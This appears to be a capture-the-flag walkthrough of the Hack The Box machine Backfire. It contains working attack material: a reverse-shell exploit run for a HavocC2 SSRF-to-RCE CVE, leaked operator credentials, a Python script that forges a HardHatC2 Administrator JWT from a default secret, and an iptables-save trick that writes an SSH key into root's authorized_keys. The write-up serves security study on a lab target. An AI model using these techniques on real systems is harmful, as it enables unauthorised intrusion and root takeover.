Hello everyone! In this post I return to another Season 7 machine from Hack The Box: Backfire. The box is built around a vulnerable HavocC2 teamserver (SSRF chained to RCE) and a privilege escalation through iptables binaries that sudo lets a user run as root.
Initial Scan
As usual, we start with an nmap scan:
└─# nmap -sCV 10.10.11.49
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-31 10:39 EST
Nmap scan report for 10.10.11.49
Host is up (0.032s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_ 256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp open ssl/http nginx 1.22.1
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
|_http-server-header: nginx/1.22.1
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=Cloud Co/stateOrProvinceName=Arizona/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Not valid before: 2024-05-10T04:56:07
|_Not valid after: 2027-05-10T04:56:07
| tls-alpn:
| http/1.1
| http/1.0
|_ http/0.9
4444/tcp filtered krb524
5000/tcp filtered upnp
8000/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 1559 17-Dec-2024 11:31 disable_tls.patch
| 875 17-Dec-2024 11:34 havoc.yaotl
|_
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan gives us several open ports:
- Port 22: SSH (OpenSSH 9.2p1 on Debian 12)
- Port 443: HTTPS served by nginx 1.22.1; the certificate is issued for 127.0.0.1, a hint that nginx fronts a service bound to loopback
- Port 8000: HTTP served by nginx with directory listing enabled, exposing two files
- Ports 4444 and 5000: filtered, i.e. something answers for the port rather than the service itself (we will see the firewall rule responsible later)
Web Service Enumeration
On port 8000 we find two interesting files:
- disable_tls.patch
- havoc.yaotl
Analysis of havoc.yaotl
havoc.yaotl is the configuration file of a HavocC2 teamserver:
Teamserver {
Host = "127.0.0.1"
Port = 40056
Build {
Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
Nasm = "/usr/bin/nasm"
}
}
Operators {
user "ilya" {
Password = "CobaltStr1keSuckz!"
}
user "sergej" {
Password = "1w4nt2sw1tch2h4rdh4tc2"
}
}
Demon {
Sleep = 2
Jitter = 15
TrustXForwardedFor = false
Injection {
Spawn64 = "C:\\Windows\\System32\\notepad.exe"
Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
}
}
Listeners {
Http {
Name = "Demon Listener"
Hosts = [
"backfire.htb"
]
HostBind = "127.0.0.1"
PortBind = 8443
PortConn = 8443
HostRotation = "round-robin"
Secure = true
}
}
The file hands us two sets of operator credentials in cleartext:
- Username: ilya
- Password: CobaltStr1keSuckz!
- Username: sergej
- Password: 1w4nt2sw1tch2h4rdh4tc2
Two other details matter later: the teamserver management interface listens on 127.0.0.1:40056, and the Demon HTTP listener binds 127.0.0.1:8443 with Secure = true. Neither is reachable from outside directly; the exploit below goes through the nginx endpoint on port 443.
Analysis of disable_tls.patch
The patch disables TLS on the WebSocket management port 40056. The author's justification is in the patch header:
Disable TLS for Websocket management port 40056, so I can prove that
sergej is not doing any work
Management port only allows local connections (we use ssh forwarding) so
this will not compromise our teamserver
diff --git a/client/src/Havoc/Connector.cc b/client/src/Havoc/Connector.cc
index abdf1b5..6be76fb 100644
--- a/client/src/Havoc/Connector.cc
+++ b/client/src/Havoc/Connector.cc
@@ -8,12 +8,11 @@ Connector::Connector( Util::ConnectionInfo* ConnectionInfo )
{
Teamserver = ConnectionInfo;
Socket = new QWebSocket();
- auto Server = "wss://" + Teamserver->Host + ":" + this->Teamserver->Port + "/havoc/";
+ auto Server = "ws://" + Teamserver->Host + ":" + this->Teamserver->Port + "/havoc/";
auto SslConf = Socket->sslConfiguration();
/* ignore annoying SSL errors */
SslConf.setPeerVerifyMode( QSslSocket::VerifyNone );
- Socket->setSslConfiguration( SslConf );
Socket->ignoreSslErrors();
QObject::connect( Socket, &QWebSocket::binaryMessageReceived, this, [&]( const QByteArray& Message )
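Review bot: once the scheme on the `+ auto Server = "ws://" ...` line is ws://, the TLS configuration that follows is dead code: `auto SslConf = Socket->sslConfiguration();`, `SslConf.setPeerVerifyMode( QSslSocket::VerifyNone );` and `Socket->ignoreSslErrors();` no longer influence anything after `setSslConfiguration( SslConf )` is removed, so drop them as well rather than leave a VerifyNone setup that looks deliberate. The bigger problem is the justification in the header: "only allows local connections" describes who can reach 127.0.0.1:40056, not who can read the traffic or whether the server itself can be made to connect there. Every operator login now crosses this socket in cleartext, and any process on the teamserver host, or any server-side request the teamserver can be induced to issue to its own loopback, reaches a management endpoint with not even a TLS handshake in the way.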
diff --git a/teamserver/cmd/server/teamserver.go b/teamserver/cmd/server/teamserver.go
index 9d1c21f..59d350d 100644
--- a/teamserver/cmd/server/teamserver.go
+++ b/teamserver/cmd/server/teamserver.go
@@ -151,7 +151,7 @@ func (t *Teamserver) Start() {
}
// start the teamserver
- if err = t.Server.Engine.RunTLS(Host+":"+Port, certPath, keyPath); err != nil {
+ if err = t.Server.Engine.Run(Host+":"+Port); err != nil {
logger.Error("Failed to start websocket: " + err.Error())
}
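Review bot: replacing `t.Server.Engine.RunTLS(Host+":"+Port, certPath, keyPath)` with `t.Server.Engine.Run(Host+":"+Port)` leaves `certPath` and `keyPath` without a consumer in this hunk; check whether Start() still references them elsewhere, because Go rejects unused locals and otherwise the certificate generation that produced them is now dead code too. The header's claim that the port "only allows local connections" is also not enforced anywhere in this hunk: `Host` comes from the Teamserver block of the config (127.0.0.1 in the shipped havoc.yaotl), so a one-line config change exposes a plaintext management port, and nothing in this code path refuses a non-loopback bind when TLS is off. If TLS is to be optional, put it behind an explicit config flag that also rejects binding to anything but loopback.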
Exploiting HavocC2 (CVE-2024-41570)
Searching for known issues in Havoc turns up CVE-2024-41570, an SSRF in the teamserver that can be chained to RCE. The SSRF lets an attacker make the teamserver open connections from its own host, which puts the loopback-only management port 40056 within reach; because the patch above stripped TLS from that port, a script can talk to it directly, authenticate with the operator credentials from havoc.yaotl (which is why the exploit needs a username and password), and run commands. We use a publicly available exploit script, saved locally as e.py.
Setting Up a Reverse Shell Listener
We start a listener for the reverse shell:
└─# nc -lvnp 1234
listening on [any] 1234 ...
Running the Exploit
We run the exploit with the operator credentials recovered from the configuration file; -l is our own tun0 address, which the reverse shell connects back to:
└─# python3 e.py -t https://10.10.11.49 -l 10.10.14.103 --c2user ilya --c2pass CobaltStr1keSuckz!
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
28681
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
Initial Shell and User Flag
The callback arrives as the user ilya (the output echoes each command because the shell has no tty):
ilya@backfire:~/Havoc/payloads/Demon$ whoami
whoami
ilya
ilya@backfire:~$ ls
ls
files
hardhat.txt
Havoc
user.txt
ilya@backfire:~$ cat user.txt
552a1eaea06acf19769ec3b4086bb914
Stabilising Access over SSH
Generating an SSH Key
We generate a key pair so we can move from the raw reverse shell to a stable SSH session:
└─# ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa
Generating public/private rsa key pair.
Enter passphrase for "/root/.ssh/id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
Getting the Public Key
└─# cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAA...OpNvAxIgkM4iryYJuCin8Na1skesug/TwCJWvmCCRkmBeVen0yhQIubkQzuucPsIhsmkJtY3WW876hM2ylREkSPe03xOWVI...== root@kali
Adding the Public Key to ilya's authorized_keys
ilya@backfire:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAA...OpNvAxIgkM4iryYJuCin8Na1skesug/TwCJWvmCCRkmBeVen0yhQIubkQzuucPsIhsmkJtY3WW876hM2ylREkSPe03xOWVI...== root@kali" > authorized_keys
Logging in via SSH
└─# ssh -i /root/.ssh/id_rsa ilya@backfire.htb
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
Further Enumeration
Additional Information from hardhat.txt
ilya@backfire:~$ cat hardhat.txt
Sergej said he installed HardHatC2 for testing and not made any changes to the defaults
I hope he prefers Havoc bcoz I don't wanna learn another C2 framework, also Go > C#
Inspecting Network Services
ilya@backfire:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:7096 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:40056 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 0.0.0.0:68 0.0.0.0:*
Port Forwarding
Ports 5000 and 7096 bind to 0.0.0.0, yet nmap reported 5000 as filtered; the iptables rules we see later (REJECT unless the source is 127.0.0.1) explain why. We tunnel both ports over SSH so that, on the box, the connections originate from loopback:
└─# ssh -i ~/.ssh/id_rsa ilya@backfire.htb -L 7096:127.0.0.1:7096 -L 5000:127.0.0.1:5000
Exploiting HardHatC2
Forging a HardHatC2 Admin Token
hardhat.txt told us HardHatC2 runs with its defaults, and the default install signs its JWTs with a hard-coded HS256 secret. Anyone who knows that secret can mint a token with any role, so we use a short Python script to forge an Administrator token and register a new account through the API on port 5000 (reached via the tunnel):
import datetime
import uuid

import jwt  # PyJWT: pip install pyjwt
import requests
import urllib3

# The HardHatC2 API is on port 5000 (via the SSH tunnel); the web console is on 7096.
rhost = '127.0.0.1:5000'

# The service uses a self-signed certificate, so requests is called with verify=False
# below; silence the warning it would otherwise print on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Craft an Administrator JWT. Secret and issuer are HardHatC2's shipped defaults,
# which hardhat.txt told us were never changed.
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"
issuer = "hardhatc2.com"
# Use an aware UTC datetime: a naive utcnow() value has its .timestamp() taken as
# local time, which skews iat/exp by the local UTC offset.
now = datetime.datetime.now(datetime.timezone.utc)
expiration = now + datetime.timedelta(days=28)
payload = {
    "sub": "HardHat_Admin",
    "jti": str(uuid.uuid4()),
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1",
    "iss": issuer,
    "aud": issuer,
    "iat": int(now.timestamp()),
    "exp": int(expiration.timestamp()),
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator"
}
token = jwt.encode(payload, secret, algorithm="HS256")
print("Generated JWT:")
print(token)

# Use the admin JWT to register a new user 'sth_pentest' with the TeamLead role.
burp0_url = f"https://{rhost}/Login/Register"
burp0_headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json"
}
burp0_json = {
    "password": "sth_pentest",
    "role": "TeamLead",
    "username": "sth_pentest"
}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
print(r.status_code, r.text)
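The script above leans on PyJWT. To make the failure mode concrete, here is an added example (not HardHatC2 code and not from the original post) that implements HS256 signing and verification with the standard library only and uses it two ways: to forge the same Administrator token, and to check whether a captured token was signed with the shipped default secret, which is the audit an operator would want to run on their own deployment after reading this. The claim names and the default secret are the ones from the script above; the verification rules (single accepted algorithm, issuer, audience, expiry) are generic JWT checks, not HardHatC2's exact implementation.

```python
"""HS256 JWT forging and verification with the standard library only.

Added example: the claim names and the default signing secret below are the
ones used in the exploit script on this page; the verifier mirrors generic JWT
validation rules, not HardHatC2's own code.
"""
import base64
import hashlib
import hmac
import json
import time
import uuid

DEFAULT_SECRET = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"  # shipped default, per the page
ISSUER = "hardhatc2.com"
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"
NAMEID_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _json(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def hs256_sign(claims: dict, secret: str) -> str:
    """Build header.payload.signature; the signature is HMAC-SHA256 over the first two parts."""
    signing_input = _b64url(_json({"alg": "HS256", "typ": "JWT"})) + "." + _b64url(_json(claims))
    sig = hmac.new(secret.encode("utf-8"), signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def hs256_verify(token: str, secret: str, issuer: str, now=None):
    """Return the claims if `token` is valid under `secret`, otherwise None.

    Rejects a header that does not say HS256 (no alg=none, no algorithm confusion),
    a bad signature, a wrong iss/aud, and an expired exp.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None
        expected = hmac.new(secret.encode("utf-8"),
                            (header_b64 + "." + payload_b64).encode("ascii"),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(payload_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(claims, dict):
        return None
    now = int(time.time()) if now is None else now
    if claims.get("iss") != issuer or claims.get("aud") != issuer:
        return None
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None
    return claims


def forge_admin_token(secret: str = DEFAULT_SECRET, now=None) -> str:
    """Mint the same Administrator token the exploit script builds."""
    now = int(time.time()) if now is None else now
    claims = {
        "sub": "HardHat_Admin",
        "jti": str(uuid.uuid4()),
        NAMEID_CLAIM: "1",
        "iss": ISSUER,
        "aud": ISSUER,
        "iat": now,
        "exp": now + 28 * 24 * 3600,
        ROLE_CLAIM: "Administrator",
    }
    return hs256_sign(claims, secret)


def signed_with_default_secret(token: str) -> bool:
    """Audit check: a token that verifies under the shipped secret means the
    deployment never rotated it, and anyone can mint credentials for it."""
    return hs256_verify(token, DEFAULT_SECRET, ISSUER) is not None


if __name__ == "__main__":
    forged = forge_admin_token()
    print(forged)
    print("default secret still in use:", signed_with_default_secret(forged))
```

Running it prints a token structurally identical to the one the exploit script produces. The verifier is the half worth keeping: pointed at a token copied from a browser session, `signed_with_default_secret` answers whether an instance is still trusting the default key, and the `alg` check shows why accepting whatever algorithm the header claims would make the secret irrelevant.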
Accessing the HardHatC2 Console
With the new account created, we can log in to the HardHatC2 console at https://127.0.0.1:7096 (through the SSH tunnel) using the credentials we just registered.
Implant Terminal Access
The implant registered in the console runs as sergej, so commands typed in Implant Interact > Terminal execute in his context. We use it to append our public key to sergej's authorized_keys:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAA...JFdwoX2p99mp0TzvLElli7BcmW+pzSR7nnoe6/Q7l/cK2MoUQ9ZbXdeg0xIqDMe4xejytWrqoYw4VUeneFARc01KLdHT+1fv4N7k4R9ohCQsfCRgiq0l1tfUCV+AtEWYWCFSpCyGctqtLn750toe8qgSdSpGEmO90tly4rihUNrUw== root@kali" | tee -a ~/.ssh/authorized_keys
Access as sergej
└─# ssh -i ~/.ssh/id_rsa sergej@backfire.htb
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
sergej@backfire:~$ whoami
sergej
Privilege Escalation to Root
Checking sudo Privileges
sergej@backfire:~$ sudo -l
Matching Defaults entries for sergej on backfire:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User sergej may run the following commands on backfire:
(root) NOPASSWD: /usr/sbin/iptables
(root) NOPASSWD: /usr/sbin/iptables-save
Abusing iptables
sergej may run iptables and iptables-save as root without a password. iptables-save -f writes the live ruleset to any path, as root, and iptables lets us embed arbitrary text in a rule comment; together that is an arbitrary file write. The plan: put our public key, surrounded by newlines, into a comment, then save the ruleset over /root/.ssh/authorized_keys. sshd reads authorized_keys one line at a time and ignores lines it cannot parse, so the iptables syntax around the key line is harmless. Two caveats: the comment match stores comments in a 256-byte buffer (255 usable characters), so the 4096-bit RSA key from earlier does not fit and we generate the short ED25519 key shown below first; and the write replaces any existing root keys, which on a real engagement is destructive and needs to be agreed and recorded. The file is created with root's umask (0644 on a default Debian root shell), which sshd's StrictModes accepts.
- Add a rule whose comment carries the SSH public key (the text YOU SSH PUB stands in for the actual ssh-ed25519 line):
sergej@backfire:~$ sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n YOU SSH PUB \n'
- Inspect the result; iptables -S shows the comment quoted, with the newlines intact:
sergej@backfire:~$ sudo iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 5000 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 7096 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -i lo -m comment --comment "
" -j ACCEPT
- Save the ruleset over root's authorized_keys:
sergej@backfire:~$ sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
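To show why this works without needing root, here is an added example (not from the original post) that reproduces the two behaviours the technique relies on, using constructed data: how iptables-save serialises a comment (double-quoted, only backslash and double quote escaped, newlines kept verbatim, as the iptables -S output above already shows) and how sshd reads authorized_keys (one entry per line, anything that does not parse as a key is skipped). It also checks the 255-character comment limit, which is what rules out the RSA key. The sample ruleset mirrors the one on the page, and the ed25519 key blob is a well-formed placeholder, not a real key.

```python
"""Why a rule comment saved with `iptables-save -f` becomes a usable authorized_keys.

Added example, not from the original post. It models iptables-save's comment
serialisation and sshd's line-oriented authorized_keys parsing with constructed
data; the sample ruleset and the ed25519 key blob are made up for this example.
"""
import base64
import binascii
import struct

# xt_comment keeps comments in a 256-byte buffer including the NUL terminator.
XT_MAX_COMMENT_LEN = 256

SSH_KEY_TYPES = {"ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
                 "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def comment_fits(comment: str) -> bool:
    """True if iptables would accept this --comment value (at most 255 bytes)."""
    return len(comment.encode("utf-8")) <= XT_MAX_COMMENT_LEN - 1


def save_comment(comment: str) -> str:
    """Serialise a comment the way iptables-save does: wrapped in double quotes,
    with backslash and double quote escaped; newlines pass through untouched."""
    escaped = comment.replace("\\", "\\\\").replace('"', '\\"')
    return '--comment "' + escaped + '"'


def rule_with_key(pubkey_line: str) -> str:
    """The rule from the page as iptables-save emits it: the key ends up on its own line."""
    comment = "\n" + pubkey_line + "\n"
    return "-A INPUT -i lo -m comment " + save_comment(comment) + " -j ACCEPT"


def _blob_type(blob_b64: str):
    """Decode an SSH public key blob and return the key type string it embeds."""
    try:
        blob = base64.b64decode(blob_b64, validate=True)
        (n,) = struct.unpack(">I", blob[:4])
        if n > len(blob) - 4:
            return None
        return blob[4:4 + n].decode("ascii")
    except (binascii.Error, struct.error, UnicodeDecodeError):
        return None


def authorized_keys_entries(text: str):
    """Parse authorized_keys like sshd: skip blank and '#' lines, then require
    'keytype base64 [comment]' where the blob's embedded type matches the first
    field. (sshd also accepts an options prefix; this simplified parser does not.)
    Every line iptables-save writes fails these checks and is ignored, which is
    what makes the overwrite harmless to sshd."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 2 or fields[0] not in SSH_KEY_TYPES:
            continue
        if _blob_type(fields[1]) != fields[0]:
            continue
        entries.append((fields[0], fields[1], " ".join(fields[2:])))
    return entries


# Constructed ed25519 public key: a well-formed blob (type string + 32 zero bytes), not a real key.
_ED25519_BLOB = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(32)
PUBKEY_LINE = "ssh-ed25519 " + base64.b64encode(_ED25519_BLOB).decode("ascii") + " root@kali"

# A 4096-bit RSA public key line is roughly 720 characters of base64; constructed filler.
RSA4096_LINE = "ssh-rsa " + "A" * 716 + " root@kali"

# Constructed iptables-save output modelled on the ruleset shown on the page.
SAVED_RULESET = "\n".join([
    "# Generated by iptables-save",
    "*filter",
    ":INPUT ACCEPT [0:0]",
    ":FORWARD ACCEPT [0:0]",
    ":OUTPUT ACCEPT [0:0]",
    "-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT",
    "-A INPUT -p tcp -m tcp --dport 5000 -j REJECT --reject-with icmp-port-unreachable",
    "-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT",
    "-A INPUT -p tcp -m tcp --dport 7096 -j REJECT --reject-with icmp-port-unreachable",
    rule_with_key(PUBKEY_LINE),
    "COMMIT",
    "# Completed",
]) + "\n"

if __name__ == "__main__":
    print("ed25519 line fits in a comment:", comment_fits("\n" + PUBKEY_LINE + "\n"))
    print("rsa-4096 line fits in a comment:", comment_fits("\n" + RSA4096_LINE + "\n"))
    for keytype, blob, comment in authorized_keys_entries(SAVED_RULESET):
        print("sshd would accept:", keytype, blob[:20] + "...", comment)
```

The parser finds exactly one usable entry in the saved ruleset, the ed25519 line, while every `-A`, `:CHAIN`, `*filter` and `COMMIT` line is discarded. The same parser is handy on the defensive side: run over /root/.ssh/authorized_keys it surfaces a key that is wrapped in iptables syntax, which is the artefact an incident responder should look for after seeing iptables-save in sudo logs with an unexpected -f path.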
Generating an ED25519 Key
The comment needs a key that fits within 255 characters. An ED25519 public key line is about 90 characters long, so we generate one and paste its .pub line in place of the placeholder in the --comment above:
└─# ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519):
Enter passphrase for "/root/.ssh/id_ed25519" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_ed25519
Your public key has been saved in /root/.ssh/id_ed25519.pub
Logging in as Root and Reading the Root Flag
└─# ssh -i ~/.ssh/id_ed25519 root@10.10.11.49
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
root@backfire:~# whoami
root
root@backfire:~# cat root.txt
ad3cd8f586278be5dbf03e3ccc925599
Conclusion
Backfire chains three attack vectors:
- HavocC2 SSRF to RCE: CVE-2024-41570, helped along by a management port stripped of TLS, gives the initial foothold as ilya
- HardHatC2 JWT forgery: an unchanged default signing secret lets anyone mint an Administrator token and reach the console, and through it sergej's shell
- iptables privilege escalation: passwordless sudo on iptables and iptables-save turns a rule comment into an arbitrary file write as root
Attack Path Summary
HavocC2 SSRF → user ilya → HardHatC2 JWT forgery → user sergej → iptables privilege escalation → root